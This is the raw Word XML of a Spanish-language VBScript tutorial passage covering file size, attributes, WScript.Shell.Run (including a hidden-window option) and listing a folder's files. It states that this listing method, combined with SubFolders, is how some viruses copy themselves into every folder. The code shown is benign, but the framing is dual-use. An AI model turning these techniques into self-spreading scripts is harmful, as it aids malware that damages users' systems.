      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en definitiva, no es más que una variable numérica que representa los atributos del archivo. Parece difícil, pero es sencillo si practicas un poco, solo debes pensarlo con lógica y </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>hacerlo tal y como se explica</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Por último, para ver los atributos de un archivo, haz clic en el botón derecho en el y elige propiedades, luego busca este recuadro, que esta abajo de todo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1656"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3390900" cy="1151890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5509" name="Picture 5509"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="5509" name="Picture 5509"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3390900" cy="1151890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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xta función</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 xml:space="preserve">. Esta función devuelve un valor que indica el tamaño </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>en bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de un archivo (variable numerica). Para que no aparezcan números muy grandes podemos, dividiéndolo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>entre 1020, pasarlo a Kbytes, y con la función Fix quitarle los decimales. La variable tamaño guarda los datos obtenidos en este ejemplo:</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880"/>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1021"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arc = fso.GetFile("c:\Doc2.doc") tamano = fix(arc.</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1020)</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mos, esta función también requiere darle a una variable la estructura de un archivo: el archivo que le indiquemos en la segunda línea, y la función que nos da el tamaño es </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>arc.Size</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>técnicamente no es más que una variable de solo lectura de la estructura del archivo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que hemos creado en la línea dos, que contiene en ella un numero que representa el tamaño del archivo. Un ejemplo, para que se vea mejor podría ser el siguiente:</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156"/>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1566"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pepe = fso.GetFile("c:\Doc2.doc") tamano = fix(pepe.</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1020) atributo =</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> pepe</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>.Attributes</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ejemplo vemos las dos anteriores funciones. Vemos como en la línea 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">creamos el objeto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>en la variable fso, en la línea 2</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> creamos una estructura</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> del archivo Doc2.doc que hay en el disco duro C, y en la tercera y cuarta línea usamos las funciones explicadas anteriormente para obtener respectivamente el tamaño del archivo y sus atributos actuales. No olvidemos que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cualquier variable en la que podamos escribir también la podremos leer</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (no todas las que se pueden leer se pueden escribir, como es el caso de </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 xml:space="preserve">), por lo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tanto</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> no hay problema en saber cuales son los atributos de un archivo en vez de ponérselos tu. Esto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se aplica también a muchas otras funciones</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, estate atento, pues ese tipo de cosas debes ir sacándolas ya tu sol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ptim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un</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función abre el archivo que le indiquemos, de la forma que comúnmente se abre </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>haciendo doble clic encima</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Fíjate que esta usa el objeto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WScript.shell</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. La sintaxis "c:\Doc2.txt" indica la ruta y el archivo que se va a ejecutar. Con esta función también podemos abrir </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>páginas Web</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, colocando la URL en el argumento de la función, en vez de un archivo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:after="322"/>
        <w:ind w:left="17" w:right="3942"/>
        <w:jc w:val="left"/>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 ws</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">.Run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"c:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Doc2.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00822E99" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="322"/>
        <w:ind w:left="93"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota personal: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00822E99" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="322"/>
        <w:ind w:left="93"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>objShell.Run(strCommand, [intWindowsStyle], [bWaitOnReturn])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00822E99" w:rsidRDefault="0011696B">
      <w:pPr>
        <w:spacing w:after="322"/>
        <w:ind w:left="93"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>srtCommand: Comando a ejecutar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011696B" w:rsidRDefault="0011696B" w:rsidP="0011696B">
      <w:pPr>
        <w:spacing w:after="322"/>
        <w:ind w:left="93"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>intWindowsStyle:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011696B" w:rsidRDefault="0011696B" w:rsidP="0011696B">
      <w:pPr>
        <w:spacing w:after="322"/>
        <w:ind w:left="93"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>[</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0: oculto]</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1:</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normal]</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2: minimizado]</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 3: maximizado]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011696B" w:rsidRPr="00822E99" w:rsidRDefault="0011696B" w:rsidP="0011696B">
      <w:pPr>
        <w:spacing w:after="322"/>
        <w:ind w:left="93"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>bWaitOnReturn: Indica si el script debe esperar a que el comando se complete antes de continuar [true]</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false</w:t>
      </w:r>
      <w:r w:rsidR="00873CAB">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (por defecto, si no se espesifica)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w: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octava</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es realmente una mezcla de varias que he echo yo para facilitar los datos. (En realidad es la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que indica todos los archivos de una carpeta en una colección. Yo lo que he echo es pasar esa colección a una variable normal.) Esta función crea una lista de archivos de la carpeta que le indiquemos y la guarda en la variable ListaArchivos. La sintaxi "c:\carpeta" indica la ruta y la carpeta de la que se va a sacar esa lista. Cada archivo va en una línea diferente. Así, se puede guardar esos datos en un archivo y luego ir leyéndolos línea por línea para operar en todas las subcarpetas. Este es el método que, combinado con la función </w:t>
      </w:r>
      <w:hyperlink r:id="rId43">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:u w:val="single" w:color="000000"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>SubFolders</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId44">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>,</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizan algunos virus para copiarse en todas las carpetas del ordenado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car = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>fso.GetFolder</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("c:\carpet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sc = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>car.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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or Each </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 xml:space="preserve"> in sc</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ListaArchivos = ListaArchivos&amp;</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name&amp;</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13)</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ueno, en realidad así es muy sencillo, pero me quedaría mal si no explicará que es eso de una colección y que pinta ahí un bucle For tan raro. Bueno, en primer lugar, sabed que en la línea dos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>GetFolder</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> hace lo mismo que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>GetFile</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, pero con una carpeta, lo cual quedo que queda bastante claro, y con un poco de ingenio os permitirá tocar algo de carpetas antes de que lo explique. La tercera línea lo que hace es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dar a la variable sc una colección</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que es otro tipo de datos binarios en una variable (por eso el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Entonces tenemos lo que se llama una colección en la variable sc, que por supuesto es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>una estructura también</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Supongo que entenderíais que hace si os dijera que ese carl.name que hay en la línea 5 es en realidad sc.name. Si, lo que hace es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sacar el nombre del archivo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la variable sc usando el mismo método que hemos usado en anteriores funciones. Pero porque entonces el For raro y el carl.name en vez de sc. Es simple, porque como he dicho antes es una colección. Una vez lo entendáis será sencillo. En realidad en las funciones de antes (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>src.Size</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por ejemplo) teníamos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>una estructura de un archivo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y lo que hacíamos era sacar el dato que queríamos, nada más. Pero aquí no tenemos la estructura de un archivo, tenemos la</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
